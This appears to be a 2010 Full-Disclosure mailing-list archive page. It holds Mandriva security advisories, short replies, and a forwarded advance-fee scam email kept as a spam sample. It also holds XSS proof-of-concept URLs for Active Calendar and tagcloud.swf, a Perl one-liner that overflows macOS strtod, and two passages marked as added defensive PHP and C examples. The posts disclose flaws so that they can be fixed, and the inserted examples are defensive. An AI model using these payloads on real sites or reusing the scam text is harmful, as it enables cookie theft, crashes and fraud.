The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes. NOTE: this is a regression error related to CVE-2003-0967 (CVE-2009-3111).

This update provides a solution to this vulnerability.

Update:

Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111

Updated Packages:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] Fwd: CONGRATULATION GOOGLE 11th ANNIVERSARY
Speaking of spam, please find attached a SPAM message I received as of late. It shows an example of the latest spam attacks, with a touch of ingenuity. However, I believe lots need to be done to make it more credible, including perhaps passing the message through a spell check first. Maybe we could expect this in some years' time, with perhaps stealthy contact/payback details.

Of interest is the given return email address, googllefundsreleasepaym...@gmail.com (notice the double l).

Just my 2 cents.

Regards,
Christian Sciberras

-- Forwarded message --
From: GOOGLE 11th ANNIVERSARY rinaldipere...@gmail.com
Date: 2010/1/11
Subject: CONGRATULATION GOOGLE 11th ANNIVERSARY
To:

GOOGLE SEARCH CORPORATION:
CUSTOMER SERVICE TARAGONA ESPANA.
ADDRESS: C/LESTANY,PARC.2,43006 TARRAGONA-SPAIN
GOOGLE SEARCH ADVERTISING:
FAX...O34372511348
TEL...034-672-511-349

GOOGLE 11th ANNIVERSARY

This is to notify all online customers that Google is 11th years; Google became a Corporation on September 27,1998. This Corporation was established to encourage individual that are active Users of Google search engine and Google ancillary service.Google is currently the world leading search engine worldwide, and is vigorously making more effort to make sure the reputation of the company stands out to be the best among the rest, with the optimize help of our customers worldwide. We wish to congratulate you once again,for being selected on the ongoing 11th Anniversary. ..

Google Corporation highly believe that with your prize, you will always be active and also A total sum of 460,000, 00{Four Hundred and Sixty Thousand European Euro} have been issued out by Google Corporation. A winning cheque will be issued in your name and also a certificate of prize claim will be sent along side with your winning cheque.

You are advised to contact your Foreign Transfer Manager with the following details Below to avoid unnecessary delay and complications.

VERIFICATION AND FUNDS RELEASE FORM.

(1) Your contact address.
(2) Your Tel/Fax numbers.
(3) Your International passport / country
(4) Your Full Names.
(5) Occupation/Age.
(6) How do you feel as one of the Winners:

Foreign Transfer Manager
Mr. Basorun Fizz
Google Corporations?
Tel... 034-672-511-349
EMAIL: googllefundsreleasepaym...@gmail.com

Note: This is an New Year giveaway for 2010 and also our Anniversary for 2009 section Only.Congratulations from the Staffs Members of the Google Board Commission.

2010 Google Corporation.
Re: [Full-disclosure] Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection
*spelt

On Sun, Jan 10, 2010 at 9:21 PM, Jef Poskanzer j...@mail.acme.com wrote:

It's spelled synergy.
---
Jef

Jef Poskanzer j...@mail.acme.com
http://acme.com/jef/
Re: [Full-disclosure] Surge in Skype Spam activity
Or you can also use:

http://sucuri.net/?page=tools&title=check-url

Which checks any short URL and also run them through site advisor and google safe browsing to see what they think of it...

--dd

On Mon, Jan 11, 2010 at 2:08 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:

http://kiserai.net/turl.pl

Tiny URL decoder. I was going to send the TinyURL decoder in a TinyURL, but I’m just not that motivated atm. ☺

t

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Larry Seltzer
Sent: Monday, January 11, 2010 5:44 AM
To: dramacrat; Chen Levkovich
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Surge in Skype Spam activity

It’s harmless, he’s just blowing his own company’s horn.

Speaking of spam… h, shall I click a tinyurl coming from a f-d poster? n/n, pick one

this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it.

2010/1/11 Chen Levkovich chen.levkov...@securityextension.com

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm
[Full-disclosure] XSS Vulnerability in Active Calendar 1.2.0
XSS Vulnerability in Active Calendar 1.2.0

Discovered by Martin Barbella martybarbe...@gmail.com

Description of Vulnerability:

Active Calendar is PHP Class, that generates calendars (year, month or week view) as a HTML Table (XHTML-Valid). (From: http://micronetwork.de/activecalendar/index.php)

In the functions enableYearNav, enableMonthNav, enableDayLinks, and enableDatePicker of the activeCalendar class, certain variables are assigned the value of $_SERVER['PHP_SELF'] when either no value is specified for $link, or the value of $link is false. The values of these variables are not sanitized later, resulting in several cross site scripting vulnerabilities.

Systems affected:

This has been confirmed in version 1.2.0 of Active Calendar. Previous versions may also be affected.

Impact:

When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user's browser. The browser then executes the code because it came from a trusted server. (From OWASP: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29)

Mitigating factors:

The vulnerabilities will only affect applications which call the four functions above with the default values, or applications which call the above functions with false passed as the value of the $link parameter.

Proof of concept:

The code segment shows a basic example of how Active Calendar could be used with a call to one of the four vulnerable functions.

<?php
require_once("activecalendar.php");
$cal = new activeCalendar();
$cal->enableDayLinks();
?>
<?php print "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Active Calendar XSS Example</title>
</head>
<body>
<center>
<?php print $cal->showYear(); ?>
</center>
</body>
</html>

If this script was located at http://site/test.php, the vulnerability could be demonstrated by viewing http://site/test.php/"><script>document.body.innerHTML='XSS';</script>.

Workaround:

When using the activeCalendar class, explicitly pass a sanitized value for the $link parameter when calling the functions enableYearNav, enableMonthNav, enableDayLinks, and enableDatePicker.
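One way to apply the workaround above, as an added example that is not part of the original advisory or of the Active Calendar code: build the $link value from $_SERVER['SCRIPT_NAME'], which stops at the script and so leaves out the attacker-controlled path suffix that PHP_SELF carries, then HTML-escape it. The helper name safe_self_link(), the constructed request values, and the position of $link as the first argument of enableDayLinks() are assumptions.

```php
<?php
// Added example (not from the advisory or from Active Calendar).
// safe_self_link() is a hypothetical helper; the sample request values
// below are constructed to mirror the advisory's http://site/test.php case.

/**
 * Return an HTML-attribute-safe link to the current script.
 *
 * PHP_SELF includes PATH_INFO, so anything after "test.php/" is
 * attacker-controlled. SCRIPT_NAME stops at the script itself.
 */
function safe_self_link(array $server): string
{
    $script = isset($server['SCRIPT_NAME']) ? (string) $server['SCRIPT_NAME'] : '';

    // Allow-list: a plain path of letters, digits, "_", "-", "." and "/".
    // Anything else falls back to an empty (relative) link.
    if (!preg_match('#^/[A-Za-z0-9_\-./]*$#', $script)) {
        $script = '';
    }

    // Escape for use inside an HTML attribute, quotes included.
    return htmlspecialchars($script, ENT_QUOTES, 'UTF-8');
}

// Constructed request for the URL shown in the proof of concept.
$request = array(
    'SCRIPT_NAME' => '/test.php',
    'PHP_SELF'    => '/test.php/"><script>document.body.innerHTML=\'XSS\';</script>',
);

$unsafe = $request['PHP_SELF'];      // what the class falls back to when $link is false
$safe   = safe_self_link($request);  // what the workaround passes instead

echo "PHP_SELF:  ", $unsafe, "\n";
echo "safe link: ", $safe, "\n";

// With the library loaded, pass the value explicitly instead of relying on
// the default. The same applies to enableYearNav, enableMonthNav and
// enableDatePicker. Assumption: $link is the first parameter here.
if (class_exists('activeCalendar')) {
    $cal = new activeCalendar();
    $cal->enableDayLinks(safe_self_link($_SERVER));
    print $cal->showYear();
}
```

Run from the command line without the library, the script prints the raw PHP_SELF value next to the link the helper returns, which is just /test.php.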
Re: [Full-disclosure] Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection
Or spelled. http://dictionary.reference.com/browse/spelled

--On Monday, January 11, 2010 12:46:29 -0600 Benji m...@b3nji.com wrote:

*spelt

On Sun, Jan 10, 2010 at 9:21 PM, Jef Poskanzer j...@mail.acme.com wrote:

It's spelled synergy.
---
Jef

Jef Poskanzer ...@mail.acme.com
http://acme.com/jef/

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions are my own and not those of my employer.
***
It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson
[Full-disclosure] [ MDVSA-2009:241-1 ] squid
Mandriva Linux Security Advisory MDVSA-2009:241-1
http://www.mandriva.com/security/

Package : squid
Date: January 11, 2010
Affected: 2008.0

Problem Description:

A vulnerability was discovered and corrected in squid:

The strListGetItem function in src/HttpHeaderTools.c in Squid 2.7 allows remote attackers to cause a denial of service via a crafted auth header with certain comma delimiters that trigger an infinite loop of calls to the strcspn function (CVE-2009-2855).

This update provides a solution to this vulnerability.

Update:

Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2855

Updated Packages:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] TSA Logo Contest - Schneier
http://www.schneier.com/blog/archives/2010/01/tsa_logo_contes.html
Re: [Full-disclosure] Surge in Skype Spam activity
On 1/11/2010 3:26 AM, Chen Levkovich wrote:

Surge in Skype Spam activity.
http://tinyurl.com/yc38trm

If only your site actually said anything about the spam... Like what kind of viruses the software they're peddling is infected with or something.

Useless post is useless.

-J

--
It is no measure of health to be well adjusted to a profoundly sick society.
-Krishnamurti
Re: [Full-disclosure] XSS vulnerabilities in 34 millions flash files
Yo MustDie,

Post your shit here: http://www.exploit-db.com/

They love XSS.

2010/1/11 MustLive mustl...@websecurity.com.ua

Hello Full-Disclosure!

Yesterday I wrote the article XSS vulnerabilities in 34 millions flash files (http://websecurity.com.ua/3842/), and here is English version of it.

In December in my article XSS vulnerabilities in 8 millions flash files (http://websecurity.com.ua/3789/) I wrote, that there are up to 3400 of flashes tagcloud.swf in Internet which are potentially vulnerable to XSS attacks. Taking into account that people mostly didn't draw attention in previous article to my mentioning about another 34 millions of vulnerable flashes, then I decided to write another article about it.

File tagcloud.swf was developed by author of plugin WP-Cumulus for WordPress (http://websecurity.com.ua/3665/) and it's delivered with this plugin for WordPress, and also with other plugins, particularly Joomulus (http://websecurity.com.ua/3801/) and JVClouds3D (http://websecurity.com.ua/3839/) for Joomla and Blogumus (http://websecurity.com.ua/3843/) for Blogger. Taking into account prevalence of this flash file, I'll note that it's most widespread flash file in Internet with XSS vulnerability.

- Prevalence of the problem. -

There are a lot of vulnerable tagcloud.swf files in Internet (according to Google):

http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf

If at 18.12.2009 there were about 3400 results, then now there are about 3250 results. And these are only those flash files, which were indexed by Google, and actually there can be much more of them.

So there are about 32,5 millions of sites with file tagcloud.swf which are vulnerable to XSS and HTML Injection attacks.

Among them there are about 273000 gov-sites ( http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf+inurl:gov&filter=0 ) which are vulnerable to XSS and HTML Injection attacks.

-- Vulnerabilities in swf-file. --

File tagcloud.swf is vulnerable to XSS and HTML Injection attacks via parameter tagcloud.

XSS:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

HTML Injection:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

HTML Injection attack can be conducted particularly on those flash files which have protection (in flash files or via WAF) against javascript and vbscript URI in parameter tagcloud.

Examples of vulnerable sites.

I gave examples of vulnerable sites with this swf-file in post XSS vulnerabilities in tagcloud.swf at gov and gov.ua (http://websecurity.com.ua/3835/).

So for flash developers it's better to attend to security of their flash files. And for owners of sites with vulnerable flashes (particularly tagcloud.swf) it's needed either to fix them by themselves, or to turn to their developers.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] [ MDVSA-2010:001 ] pidgin
Mandriva Linux Security Advisory MDVSA-2010:001
http://www.mandriva.com/security/

Package : pidgin
Date: January 11, 2010
Affected: 2008.0, 2009.1, Enterprise Server 5.0

Problem Description:

Security vulnerabilities have been identified and fixed in pidgin:

The OSCAR protocol plugin in libpurple in Pidgin before 2.6.3 and Adium before 1.3.7 allows remote attackers to cause a denial of service (application crash) via crafted contact-list data for (1) ICQ and possibly (2) AIM, as demonstrated by the SIM IM client (CVE-2009-3615).

Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon (CVE-2010-0013).

Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers.

This update provides pidgin 2.6.5, which is not vulnerable to these issues.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3615
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
http://pidgin.im/news/security/

Updated Packages:
[Full-disclosure] [ MDVSA-2010:002 ] pidgin
Mandriva Linux Security Advisory MDVSA-2010:002
http://www.mandriva.com/security/

Package : pidgin
Date: January 11, 2010
Affected: 2010.0

Problem Description:

A security vulnerability has been identified and fixed in pidgin:

Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon (CVE-2010-0013).

This update provides pidgin 2.6.5, which is not vulnerable to this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
http://pidgin.im/news/security/

Updated Packages:

Mandriva Linux 2010.0
Mandriva Linux 2010.0/X86_64

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com
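The two conditions named in the advisory above (a .. component in the requested emoticon name, and a request served without a prior announcement) are sketched here as an added C example. It is not libpurple's code or the 2.6.5 fix; the function names, the "smileys" directory and the announced list are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the names a client has announced in a
 * text/x-mms-emoticon message; all names here are hypothetical. */
static const char *announced[] = { "smile.png", "wink.gif" };
#define N_ANNOUNCED (sizeof announced / sizeof announced[0])

/* "Before": the requested name is joined to the directory unchecked,
 * so a ".." component walks out of the smiley directory. */
int build_path_unchecked(const char *dir, const char *name, char *out, size_t n)
{
    int len = snprintf(out, n, "%s/%s", dir, name);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Plain file name: non-empty, not "." or "..", no path separator. */
int is_plain_filename(const char *name)
{
    if (name[0] == '\0' || !strcmp(name, ".") || !strcmp(name, ".."))
        return 0;
    return strpbrk(name, "/\\") == NULL;
}

/* "After": serve only plain file names that were announced first. */
int build_path_checked(const char *dir, const char *name, char *out, size_t n)
{
    size_t i;
    int len;

    if (!is_plain_filename(name))
        return -1;
    for (i = 0; i < N_ANNOUNCED; i++)
        if (strcmp(name, announced[i]) == 0)
            break;
    if (i == N_ANNOUNCED)
        return -1;                 /* never announced: refuse the request */
    len = snprintf(out, n, "%s/%s", dir, name);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

int main(void)
{
    char buf[128];
    const char *req[] = { "wink.gif", "../../notes.txt", "other.png" };
    for (size_t i = 0; i < 3; i++)
        printf("%-16s checked=%d\n", req[i],
               build_path_checked("smileys", req[i], buf, sizeof buf));
    return 0;
}
```

The announcement check alone would already reject the traversal name, but keeping the file-name check as well means a bad entry in the announced list cannot reopen the hole.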
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
Joshua Levitsky wrote:

On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz c...@securityreason.com wrote:

[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

I tested doing printf %1.262159f 1.1 in a shell login on 10.4.11 and it took out my session. I imagine this means 10.4.11 is vulnerable as well no? Tiger is still very popular in enterprise environments that are slow to upgrade.

--
Joshua Levitsky, MCSE, CISSP
http://www.jnuxhosting.net
http://www.jnux.net
http://blog.joshie.com/
[5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1]

Could you check perl PoC ? It should overwrite esi and edi register

esi=0x41414141
edi=15

--
Best Regards,
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib) c...@securityreason.com
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HITB Ezine 'Reloaded' - Issue #001
Welcome to 2010! We are proud to announce the immediate availability of our newly "reborn" HITB ezine! You can grab your digital copies here:

https://www.hackinthebox.org/misc/HITB-Ezine-Issue-001.pdf

As some of you may know, we've previously had an ezine that used to be published monthly, however the birth of the HITBSecConf conference series has kept us too busy to continue working on it. Until now that is...

As with our conference series, the main purpose of this new format ezine is to provide security researchers a technical outlet for them to share their knowledge with the security community. We want these researchers to gain further recognition for their hard work and we have no doubt the security community will find the material beneficial to them.

We have decided to make the ezine available for free in the continued spirit of HITB in "Keeping Knowledge Free". In addition to the freely available PDF downloads, combined editions of the magazine will be printed in limited quantities for distribution at the various HITBSecConf's around the world - Dubai, Amsterdam and Malaysia. We aim to only print somewhere between 100 or 200 copies (maybe less) per conference so be sure to grab a copy when they come out!

Happy New Year once again and we hope you enjoy the zine!

Zarul Shahrin - zarulshah...@hackinthebox.org
Editor, HITB Ezine
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
I have not checked this issue in macos 10.4. In MacOS 10.1 it does not work. But the perl script (in macos 10.5)

Chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "% 0.4194310f", 0x0.0x41414141;
Chujwamwmuzg.pl ---

will crash with

esi = 0x41414141
edi = 0x15

Other bugs in libc also work on new versions of macos. Example overflow in FTSENT structure

http://securityreason.com/achievement_securityalert/60
http://securityreason.com/achievement_securityalert/68

We confirmed this issue in MacOS 10.1.

Joshua Levitsky wrote:

and it then rebooted my mac :)

On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky jlevi...@joshie.com wrote:

The below hosed my terminal session on 10.4.11... I did this in a console login so don't have the results.. You need? or is dropping me to a blue screen and lack of system response good?

#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;

Perl will crash with

esi = 0x41414141
edi = 0x15

-Josh

--
Best Regards,
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib) c...@securityreason.com
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg